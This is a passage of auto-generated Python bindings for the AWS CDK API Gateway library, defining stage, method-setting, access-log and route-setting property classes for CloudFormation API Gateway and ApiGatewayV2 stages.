"""``CfnStage.CanarySettingProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-stage-canarysetting.html#cfn-apigateway-stage-canarysetting-usestagecache
"""
return self._values.get('use_stage_cache')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CanarySettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStage.MethodSettingProperty", jsii_struct_bases=[], name_mapping={'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl_in_seconds': 'cacheTtlInSeconds', 'caching_enabled': 'cachingEnabled', 'data_trace_enabled': 'dataTraceEnabled', 'http_method': 'httpMethod', 'logging_level': 'loggingLevel', 'metrics_enabled': 'metricsEnabled', 'resource_path': 'resourcePath', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit'})
class MethodSettingProperty():
def __init__(self, *, cache_data_encrypted: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_ttl_in_seconds: typing.Optional[jsii.Number]=None, caching_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, data_trace_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, http_method: typing.Optional[str]=None, logging_level: typing.Optional[str]=None, metrics_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, resource_path: typing.Optional[str]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None):
"""
:param cache_data_encrypted: ``CfnStage.MethodSettingProperty.CacheDataEncrypted``.
:param cache_ttl_in_seconds: ``CfnStage.MethodSettingProperty.CacheTtlInSeconds``.
:param caching_enabled: ``CfnStage.MethodSettingProperty.CachingEnabled``.
:param data_trace_enabled: ``CfnStage.MethodSettingProperty.DataTraceEnabled``.
:param http_method: ``CfnStage.MethodSettingProperty.HttpMethod``.
:param logging_level: ``CfnStage.MethodSettingProperty.LoggingLevel``.
:param metrics_enabled: ``CfnStage.MethodSettingProperty.MetricsEnabled``.
:param resource_path: ``CfnStage.MethodSettingProperty.ResourcePath``.
:param throttling_burst_limit: ``CfnStage.MethodSettingProperty.ThrottlingBurstLimit``.
:param throttling_rate_limit: ``CfnStage.MethodSettingProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html
"""
self._values = {
}
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl_in_seconds is not None: self._values["cache_ttl_in_seconds"] = cache_ttl_in_seconds
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if http_method is not None: self._values["http_method"] = http_method
if logging_level is not None: self._values["logging_level"] = logging_level
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if resource_path is not None: self._values["resource_path"] = resource_path
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
@property
def cache_data_encrypted(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStage.MethodSettingProperty.CacheDataEncrypted``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-cachedataencrypted
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``CfnStage.MethodSettingProperty.CacheTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-cachettlinseconds
"""
return self._values.get('cache_ttl_in_seconds')
@property
def caching_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStage.MethodSettingProperty.CachingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-cachingenabled
"""
return self._values.get('caching_enabled')
@property
def data_trace_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStage.MethodSettingProperty.DataTraceEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-datatraceenabled
"""
return self._values.get('data_trace_enabled')
@property
def http_method(self) -> typing.Optional[str]:
"""``CfnStage.MethodSettingProperty.HttpMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-httpmethod
"""
return self._values.get('http_method')
@property
def logging_level(self) -> typing.Optional[str]:
"""``CfnStage.MethodSettingProperty.LoggingLevel``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-logginglevel
"""
return self._values.get('logging_level')
@property
def metrics_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStage.MethodSettingProperty.MetricsEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-metricsenabled
"""
return self._values.get('metrics_enabled')
@property
def resource_path(self) -> typing.Optional[str]:
"""``CfnStage.MethodSettingProperty.ResourcePath``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-resourcepath
"""
return self._values.get('resource_path')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnStage.MethodSettingProperty.ThrottlingBurstLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-throttlingburstlimit
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnStage.MethodSettingProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-stage-methodsetting.html#cfn-apigateway-stage-methodsetting-throttlingratelimit
"""
return self._values.get('throttling_rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodSettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStageProps", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'access_log_setting': 'accessLogSetting', 'cache_cluster_enabled': 'cacheClusterEnabled', 'cache_cluster_size': 'cacheClusterSize', 'canary_setting': 'canarySetting', 'client_certificate_id': 'clientCertificateId', 'deployment_id': 'deploymentId', 'description': 'description', 'documentation_version': 'documentationVersion', 'method_settings': 'methodSettings', 'stage_name': 'stageName', 'tags': 'tags', 'tracing_enabled': 'tracingEnabled', 'variables': 'variables'})
class CfnStageProps():
def __init__(self, *, rest_api_id: str, access_log_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStage.AccessLogSettingProperty"]]]=None, cache_cluster_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_cluster_size: typing.Optional[str]=None, canary_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStage.CanarySettingProperty"]]]=None, client_certificate_id: typing.Optional[str]=None, deployment_id: typing.Optional[str]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, method_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnStage.MethodSettingProperty"]]]]]=None, stage_name: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, tracing_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, variables: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None):
"""Properties for defining a ``AWS::ApiGateway::Stage``.
:param rest_api_id: ``AWS::ApiGateway::Stage.RestApiId``.
:param access_log_setting: ``AWS::ApiGateway::Stage.AccessLogSetting``.
:param cache_cluster_enabled: ``AWS::ApiGateway::Stage.CacheClusterEnabled``.
:param cache_cluster_size: ``AWS::ApiGateway::Stage.CacheClusterSize``.
:param canary_setting: ``AWS::ApiGateway::Stage.CanarySetting``.
:param client_certificate_id: ``AWS::ApiGateway::Stage.ClientCertificateId``.
:param deployment_id: ``AWS::ApiGateway::Stage.DeploymentId``.
:param description: ``AWS::ApiGateway::Stage.Description``.
:param documentation_version: ``AWS::ApiGateway::Stage.DocumentationVersion``.
:param method_settings: ``AWS::ApiGateway::Stage.MethodSettings``.
:param stage_name: ``AWS::ApiGateway::Stage.StageName``.
:param tags: ``AWS::ApiGateway::Stage.Tags``.
:param tracing_enabled: ``AWS::ApiGateway::Stage.TracingEnabled``.
:param variables: ``AWS::ApiGateway::Stage.Variables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html
"""
self._values = {
'rest_api_id': rest_api_id,
}
if access_log_setting is not None: self._values["access_log_setting"] = access_log_setting
if cache_cluster_enabled is not None: self._values["cache_cluster_enabled"] = cache_cluster_enabled
if cache_cluster_size is not None: self._values["cache_cluster_size"] = cache_cluster_size
if canary_setting is not None: self._values["canary_setting"] = canary_setting
if client_certificate_id is not None: self._values["client_certificate_id"] = client_certificate_id
if deployment_id is not None: self._values["deployment_id"] = deployment_id
if description is not None: self._values["description"] = description
if documentation_version is not None: self._values["documentation_version"] = documentation_version
if method_settings is not None: self._values["method_settings"] = method_settings
if stage_name is not None: self._values["stage_name"] = stage_name
if tags is not None: self._values["tags"] = tags
if tracing_enabled is not None: self._values["tracing_enabled"] = tracing_enabled
if variables is not None: self._values["variables"] = variables
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Stage.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-restapiid
"""
return self._values.get('rest_api_id')
@property
def access_log_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStage.AccessLogSettingProperty"]]]:
"""``AWS::ApiGateway::Stage.AccessLogSetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-accesslogsetting
"""
return self._values.get('access_log_setting')
@property
def cache_cluster_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Stage.CacheClusterEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-cacheclusterenabled
"""
return self._values.get('cache_cluster_enabled')
@property
def cache_cluster_size(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.CacheClusterSize``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-cacheclustersize
"""
return self._values.get('cache_cluster_size')
@property
def canary_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStage.CanarySettingProperty"]]]:
"""``AWS::ApiGateway::Stage.CanarySetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-canarysetting
"""
return self._values.get('canary_setting')
@property
def client_certificate_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.ClientCertificateId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-clientcertificateid
"""
return self._values.get('client_certificate_id')
@property
def deployment_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.DeploymentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-deploymentid
"""
return self._values.get('deployment_id')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-description
"""
return self._values.get('description')
@property
def documentation_version(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-documentationversion
"""
return self._values.get('documentation_version')
@property
def method_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnStage.MethodSettingProperty"]]]]]:
"""``AWS::ApiGateway::Stage.MethodSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-methodsettings
"""
return self._values.get('method_settings')
@property
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-stagename
"""
return self._values.get('stage_name')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::Stage.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-tags
"""
return self._values.get('tags')
@property
def tracing_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Stage.TracingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-tracingenabled
"""
return self._values.get('tracing_enabled')
@property
def variables(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::Stage.Variables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-variables
"""
return self._values.get('variables')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnStageProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnStageV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnStageV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Stage
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, deployment_id: str, stage_name: str, access_log_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingsProperty"]]]=None, client_certificate_id: typing.Optional[str]=None, default_route_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["RouteSettingsProperty"]]]=None, description: typing.Optional[str]=None, route_settings: typing.Any=None, stage_variables: typing.Any=None, tags: typing.Any=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Stage``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::Stage.ApiId``.
:param deployment_id: ``AWS::ApiGatewayV2::Stage.DeploymentId``.
:param stage_name: ``AWS::ApiGatewayV2::Stage.StageName``.
:param access_log_settings: ``AWS::ApiGatewayV2::Stage.AccessLogSettings``.
:param client_certificate_id: ``AWS::ApiGatewayV2::Stage.ClientCertificateId``.
:param default_route_settings: ``AWS::ApiGatewayV2::Stage.DefaultRouteSettings``.
:param description: ``AWS::ApiGatewayV2::Stage.Description``.
:param route_settings: ``AWS::ApiGatewayV2::Stage.RouteSettings``.
:param stage_variables: ``AWS::ApiGatewayV2::Stage.StageVariables``.
:param tags: ``AWS::ApiGatewayV2::Stage.Tags``.
"""
props = CfnStageV2Props(api_id=api_id, deployment_id=deployment_id, stage_name=stage_name, access_log_settings=access_log_settings, client_certificate_id=client_certificate_id, default_route_settings=default_route_settings, description=description, route_settings=route_settings, stage_variables=stage_variables, tags=tags)
jsii.create(CfnStageV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGatewayV2::Stage.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Stage.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="deploymentId")
def deployment_id(self) -> str:
"""``AWS::ApiGatewayV2::Stage.DeploymentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-deploymentid
"""
return jsii.get(self, "deploymentId")
@deployment_id.setter
def deployment_id(self, value: str):
return jsii.set(self, "deploymentId", value)
@property
@jsii.member(jsii_name="routeSettings")
def route_settings(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Stage.RouteSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-routesettings
"""
return jsii.get(self, "routeSettings")
@route_settings.setter
def route_settings(self, value: typing.Any):
return jsii.set(self, "routeSettings", value)
@property
@jsii.member(jsii_name="stageName")
def stage_name(self) -> str:
"""``AWS::ApiGatewayV2::Stage.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-stagename
"""
return jsii.get(self, "stageName")
@stage_name.setter
def stage_name(self, value: str):
return jsii.set(self, "stageName", value)
@property
@jsii.member(jsii_name="stageVariables")
def stage_variables(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Stage.StageVariables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-stagevariables
"""
return jsii.get(self, "stageVariables")
@stage_variables.setter
def stage_variables(self, value: typing.Any):
return jsii.set(self, "stageVariables", value)
@property
@jsii.member(jsii_name="accessLogSettings")
def access_log_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingsProperty"]]]:
"""``AWS::ApiGatewayV2::Stage.AccessLogSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-accesslogsettings
"""
return jsii.get(self, "accessLogSettings")
@access_log_settings.setter
def access_log_settings(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingsProperty"]]]):
return jsii.set(self, "accessLogSettings", value)
@property
@jsii.member(jsii_name="clientCertificateId")
def client_certificate_id(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Stage.ClientCertificateId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-clientcertificateid
"""
return jsii.get(self, "clientCertificateId")
@client_certificate_id.setter
def client_certificate_id(self, value: typing.Optional[str]):
return jsii.set(self, "clientCertificateId", value)
@property
@jsii.member(jsii_name="defaultRouteSettings")
def default_route_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["RouteSettingsProperty"]]]:
"""``AWS::ApiGatewayV2::Stage.DefaultRouteSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-defaultroutesettings
"""
return jsii.get(self, "defaultRouteSettings")
@default_route_settings.setter
def default_route_settings(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["RouteSettingsProperty"]]]):
return jsii.set(self, "defaultRouteSettings", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Stage.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStageV2.AccessLogSettingsProperty", jsii_struct_bases=[], name_mapping={'destination_arn': 'destinationArn', 'format': 'format'})
class AccessLogSettingsProperty():
def __init__(self, *, destination_arn: typing.Optional[str]=None, format: typing.Optional[str]=None):
"""
:param destination_arn: ``CfnStageV2.AccessLogSettingsProperty.DestinationArn``.
:param format: ``CfnStageV2.AccessLogSettingsProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-accesslogsettings.html
"""
self._values = {
}
if destination_arn is not None: self._values["destination_arn"] = destination_arn
if format is not None: self._values["format"] = format
@property
def destination_arn(self) -> typing.Optional[str]:
"""``CfnStageV2.AccessLogSettingsProperty.DestinationArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-accesslogsettings.html#cfn-apigatewayv2-stage-accesslogsettings-destinationarn
"""
return self._values.get('destination_arn')
@property
def format(self) -> typing.Optional[str]:
"""``CfnStageV2.AccessLogSettingsProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-accesslogsettings.html#cfn-apigatewayv2-stage-accesslogsettings-format
"""
return self._values.get('format')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'AccessLogSettingsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStageV2.RouteSettingsProperty", jsii_struct_bases=[], name_mapping={'data_trace_enabled': 'dataTraceEnabled', 'detailed_metrics_enabled': 'detailedMetricsEnabled', 'logging_level': 'loggingLevel', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit'})
class RouteSettingsProperty():
def __init__(self, *, data_trace_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, detailed_metrics_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, logging_level: typing.Optional[str]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None):
"""
:param data_trace_enabled: ``CfnStageV2.RouteSettingsProperty.DataTraceEnabled``.
:param detailed_metrics_enabled: ``CfnStageV2.RouteSettingsProperty.DetailedMetricsEnabled``.
:param logging_level: ``CfnStageV2.RouteSettingsProperty.LoggingLevel``.
:param throttling_burst_limit: ``CfnStageV2.RouteSettingsProperty.ThrottlingBurstLimit``.
:param throttling_rate_limit: ``CfnStageV2.RouteSettingsProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html
"""
self._values = {
}
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if detailed_metrics_enabled is not None: self._values["detailed_metrics_enabled"] = detailed_metrics_enabled
if logging_level is not None: self._values["logging_level"] = logging_level
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
@property
def data_trace_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStageV2.RouteSettingsProperty.DataTraceEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html#cfn-apigatewayv2-stage-routesettings-datatraceenabled
"""
return self._values.get('data_trace_enabled')
@property
def detailed_metrics_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStageV2.RouteSettingsProperty.DetailedMetricsEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html#cfn-apigatewayv2-stage-routesettings-detailedmetricsenabled
"""
return self._values.get('detailed_metrics_enabled')
@property
def logging_level(self) -> typing.Optional[str]:
"""``CfnStageV2.RouteSettingsProperty.LoggingLevel``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html#cfn-apigatewayv2-stage-routesettings-logginglevel
"""
return self._values.get('logging_level')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnStageV2.RouteSettingsProperty.ThrottlingBurstLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html#cfn-apigatewayv2-stage-routesettings-throttlingburstlimit
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnStageV2.RouteSettingsProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html#cfn-apigatewayv2-stage-routesettings-throttlingratelimit
"""
return self._values.get('throttling_rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'RouteSettingsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStageV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'deployment_id': 'deploymentId', 'stage_name': 'stageName', 'access_log_settings': 'accessLogSettings', 'client_certificate_id': 'clientCertificateId', 'default_route_settings': 'defaultRouteSettings', 'description': 'description', 'route_settings': 'routeSettings', 'stage_variables': 'stageVariables', 'tags': 'tags'})
class CfnStageV2Props():
def __init__(self, *, api_id: str, deployment_id: str, stage_name: str, access_log_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStageV2.AccessLogSettingsProperty"]]]=None, client_certificate_id: typing.Optional[str]=None, default_route_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStageV2.RouteSettingsProperty"]]]=None, description: typing.Optional[str]=None, route_settings: typing.Any=None, stage_variables: typing.Any=None, tags: typing.Any=None):
